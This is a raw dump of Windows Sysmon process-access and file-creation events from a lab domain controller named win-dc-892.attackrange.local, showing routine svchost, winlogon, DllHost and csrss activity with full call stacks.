12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.669{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9700-00000000AE01}4372C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.669{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9700-00000000AE01}4372C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.669{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9700-00000000AE01}4372C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.622{266CAFBE-64C1-6064-9300-00000000AE01}872NT AUTHORITY\SYSTEMC:\Windows\system32\LogonUI.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.binMD5=E871053170AD09568882637D049295DC,SHA256=CEA9EABB0B46AC602CDC3FB6FE6215981F2D7C0C6A5C5023CE72860232DBE12B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.591{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2de4|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2dce|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.591{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+57a4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\n
tdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2f9b|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.575{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2f4d|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 